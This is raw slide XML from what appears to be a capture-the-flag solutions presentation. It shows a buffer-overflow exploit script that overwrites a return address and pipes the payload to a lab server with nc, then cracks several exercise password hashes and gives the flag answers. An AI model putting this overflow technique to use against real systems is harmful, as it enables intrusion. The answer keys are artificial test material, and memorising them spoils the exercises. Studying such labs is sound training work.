              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>AA0AAFA found at offset: 40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A4517F6-F512-4085-8628-F8AA5A1ABBD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F4CC3BE5-11A7-4B26-AC86-2884AB3CBF60}"/>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Our offset is 40 characters so all we need to do is input 40 characters and then the return address that we want.</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We will point our return address to the start of the f2 function - 0x40060d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EA7600"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Calibri" pitchFamily="34"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Lets write a python script that will write a text file containing 40 A’s followed by our new return address.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D539715-80A4-4FBA-8426-9AFE040A0746}"/>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1B7EACB5-A534-4BB5-BDCB-DA6078BFD696}"/>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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>This is an example of how to programmatically generate our desired text file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Note that the return address must be given in little endian format to be correctly written into memory. This is easily achieved with the pack() method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>from struct import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>offset = "A"*40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ret_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> = 0x40060d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>input = offset + pack("&lt;Q", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ret_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>file = open("exploit.txt", "w")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>file.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>(input)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AE11615-E3B2-41F6-97BB-79229CFAE445}"/>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z="4800">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>6. What is the hidden flag?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22927BB5-2055-4DCB-920C-ABA1E056FCB1}"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>cat exploit.txt | nc 192.168.250.251 1999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Yes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Flag: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF3333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>YummelHop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
              <a:ea typeface="Tahoma"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E8B47A1-E984-40DF-8CCF-6ED41EFE9B04}"/>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1. Reverse the hash created by hash_password1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2D3A2EE-F07A-48DA-9D13-F76F1CABDE6E}"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Okay, if we look at the output, it just looks like a ASCII to hex conversion..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>echo -e "0x414d6554696d65546f6f" | xxd -r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF3333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>AMeTimeToo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70E588A-C6EC-40F5-B14E-E0C42C624815}"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8438A71B-8E44-427A-A3EB-E014F9E7B524}"/>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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Okay, Sam is improving his password hashing knowledge. He decided to try his hand at writing another password hashing function, now that he learned about cryptographically secure hashing algorithms. His new program hashed his input password and output dc89985e8f6c65b8a23b792ae0fb1827.  Unfortunately, it is not 1993. Utilizing his password hashing binary, reverse his hash output to determine his original password.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C9858E7-60FC-4F2A-819A-F27A553975C4}"/>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2. Reverse the hash created by hash_password2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7C9D98F-15EF-4D9E-A5E5-04FA941B2CFF}"/>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Okay, dc89985e8f6c65b8a23b792ae0fb1827 looks like a md5 hash.</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Strings gives us a few more hints that could be the case</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libcrypto.so.1.0.0</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OPENSSL_1.0.0</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MD5@@OPENSSL_1.0.0</a:t>
            </a:r>
          </a:p>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AA5E02-D5CB-4D23-99FA-183CDF478638}"/>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2. Reverse the hash created by hash_password2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A194C03-F7CD-46DA-8AD5-1C7D181DC1B8}"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>I googled “md5 hash cracking”, and picked the second link and tried it.  It gave me the answer - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>muffinhead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="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1176808D-040E-4677-B56B-781508A018D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum/>
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="91440" y="2651760"/>
            <a:ext cx="11910568" cy="33256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E598AC5-0F6C-40C3-9062-FFB82C2F183E}"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3497F2-A9ED-4592-BD79-C386A85673A4}"/>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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Okay, Sam is still improving his password hashing knowledge. He decided to try his hand at writing another password hashing function, now that he learned about the value of salts! His new program hashed his input password and output 5fef5ea1ddd3834fb529cb70d8251811. Unfortunately, Sam is not the best at using crypto libraries. Utilizing his password hashing binary, reverse his hash output to determine what was originally used as the input to generate that hash.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EF8EE17-BB76-4C84-BD45-7FE22C715FE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3. Find the input resulting in the hash output by hash_password3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5E32BF-0DDE-4856-9601-03FD750A0228}"/>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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>The non RE way to solve this question:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Run the binary with different passwords.  Notice anything odd?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>echo -n "0123456789" | ./hash_password3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Enter your password to encrypt: 774759259d4c17d319cfee68ef57949f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>echo -n "0123456789" | ./hash_password3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Enter your password to encrypt: 774759259d4c17d319cfee68ef57949f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>echo -n "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>monkeylion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>" | ./hash_password3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Enter your password to encrypt: 774759259d4c17d319cfee68ef57949f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Yup – the same value is output not just for the same input string (which would mean the salt isn't randomized), but the same value is output no matter what you input!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DD8720A-9256-474B-957A-1B08E3E1D0F4}"/>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3. Find the input resulting in the hash output by hash_password3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A056A579-08DC-453C-AEED-7A63BC5F72CB}"/>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nSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>This makes me think that Sam didn't do the salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>correctly..maybe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t> he is just hashing the salt?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>strings hash_password3</a:t>
            </a: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a:t>
            </a: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[]A\A]A^A_</a:t>
            </a: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Enter your password to encrypt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ThisIsTheSalties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333FF"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
              <a:ea typeface="Tahoma" pitchFamily="2"/>
            </a:endParaRP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%02x</a:t>
            </a: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;*3$"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
